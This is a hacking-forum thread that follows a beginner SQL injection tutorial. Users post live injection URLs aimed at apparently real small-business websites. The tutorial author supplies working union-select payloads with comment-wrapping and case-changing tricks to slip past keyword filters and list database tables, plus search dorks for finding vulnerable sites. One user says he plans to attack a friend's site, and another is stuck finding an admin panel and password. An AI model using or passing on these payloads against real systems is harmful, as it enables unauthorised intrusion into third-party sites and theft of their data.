SQL Injection For Beginners

[Blitz]

Forbidden

You don't have permission to access /toys/games-toys-all-ages.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
RPMWS - Custom WWW Server Server at Rainy Day - a gem of a gift shop located on Main Street in Vineyard Haven on Martha's Vineyard Port 80

I think it banned me :c

[FUKO]

I think it banned me :c

@Blitz

I doubt it, some sites have extra security. There are ways to bypass them that I didn't go over in the tutorial.
Post the link here and I'll give an example, and I plan on updating this sometime soon and adding String Based Injection and WAF bypassing (what you need).

[Blitz]

@Blitz

I doubt it, some sites have extra security. There are ways to bypass them that I didn't go over in the tutorial.
Post the link here and I'll give an example, and I plan on updating this sometime soon and adding String Based Injection and WAF bypassing (what you need).

https://www.rainydaymv.com/toys/games...,37,38,39,40--

was what I was working with

[FUKO]

https://www.rainydaymv.com/toys/games...,37,38,39,40--

was what I was working with

Alright, some sites like to block out certain words. Here's a few things they block...

Union
Select
Concat
Group_Concat
Information_schema
Table_schema

To get around it, just comment it like so: /*!TextHere*/

For example

Blocked

Code:

https://www.rainydaymv.com/toys/games-toys-all-ages.php?id=12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--

Not blocked

Code:

https://www.rainydaymv.com/toys/games-toys-all-ages.php?id=-12+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--

There's still an error, so that site is fucked up, but for future reference, comment some of those words out if you get an error like that. You can also do things like case changing.

A few more examples.

Blocked

Code:

https://site.com/view_product.php?id=null+union+select+1,2,3,4,5,6--

Not blocked

Code:

https://site.com/view_product.php?id=null+/*!union*/+select+1,2,3,4,5,6--

Blocked

Code:

https://site.com/view_product.php?id=null+/*union*/+select+1,2,concat(table_name),4,5,6+from+information_schema.tables--

Not Blocked

Code:

https://site.com/view_product.php?id=null+/*union*/+select+1,2,CoNcAt(table_name),4,5,6+from+information_schema.tables--

If you have any questions, reply or send me a VM/PM.

[Reflex-]

Nice Job and i will totally try this out

[tHeDoCtOr46]

Havij

[FUKO]

Havij

Sure, you can use HaviJ, if you're fine knowing you'll never learn anything.

HaviJ = Program that has limits
Doing it manually = No limits, you can use your imagination and do shit a stupid fucking program can't.

I posted this so people can learn something, not for them to use some shitty program.

[Krooshev]

thx for he the tut gonna fuck my friends website........

[Fogest]

thx for he the tut gonna fuck my friends website........

Only if it's vulnerable to it.

[Krooshev]

Only if it's vulnerable to it.

i hope so,

[FUKO]

i hope so,

You can do something like:

Code:

inurl:.php?id= site:https://sitename.com

Or run a scan in Acunetix.

[Lmsjr1234]

Thank you Jamal we need to make this section more active.

[FUKO]

You owe me credits for my dorks you're using there man
I'll give you a hint, starts with a k, ends with a z

Lol, thanks for the dorks. Didn't realize where I got them from. And nice to see you here
I'll have a mod edit them in.

[vnnstar]

hi Jamal. i have a problem with this site: Shopping in Armory Square - Urban Outfitters
This site error You don't have permission to access /main/shopping.php on this server.
i try all TUT from you but i can show all table in database.
Can you help me with it.
Shopping in Armory Square - Urban Outfitters /*!union*/ select 1,CoNcAt(table_name),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables--

[S|W|P]

I cant find the admin control panel and i cant find the password